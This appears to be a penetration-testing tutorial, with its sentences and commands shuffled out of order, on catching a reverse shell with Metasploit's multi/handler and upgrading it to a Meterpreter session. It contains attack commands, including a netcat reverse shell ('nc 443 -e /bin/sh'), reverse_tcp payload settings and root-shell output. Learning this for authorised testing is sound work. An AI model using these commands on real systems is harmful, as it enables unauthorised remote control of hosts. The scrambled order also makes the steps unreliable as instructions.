In this tutorial we have a root shell with write access on the path the regular Bash reverse shell is pointing to. On some occasions you might receive a permissions related error when running this exploit. Msf post(multi/manage/shell_to_meterpreter) > sessions -i 5 Msf post(multi/manage/shell_to_meterpreter) > run Msf post(multi/manage/shell_to_meterpreter) > set session 4 In the msfconsole command line we have to select the post exploitation module shell_to_meterpreter with the following command: Once the command stager has finished we can interact with the new session by running the following command: Let’s have a look at both ways starting with a direct upgrade by running the following command after we’ve put the active session to the background: Use the post/multi/manage/shell_to_meterpreter to upgrade the shell.From this point we can upgrade the shell in 2 different ways:
This takes us back to the msfconsole command line. Use Ctrl-Z to background the current session Uid=0(root) gid=0(root) groups=0(root) Step 3: Upgrade to Meterpreter shell Nc 443 -e /bin/sh msf exploit(multi/handler) > run
In real life penetration testing scenario’s this command is often executed through remote code execution (RCE) exploits using various attack vectors. Please note that we are executing this command on the target host from the command line. Now that we have got a listener running on port 443 we can issue the bash command on the target host to setup a reverse shell and connect back to the attack box. Msf exploit(multi/handler) > set lport 443 Msf exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp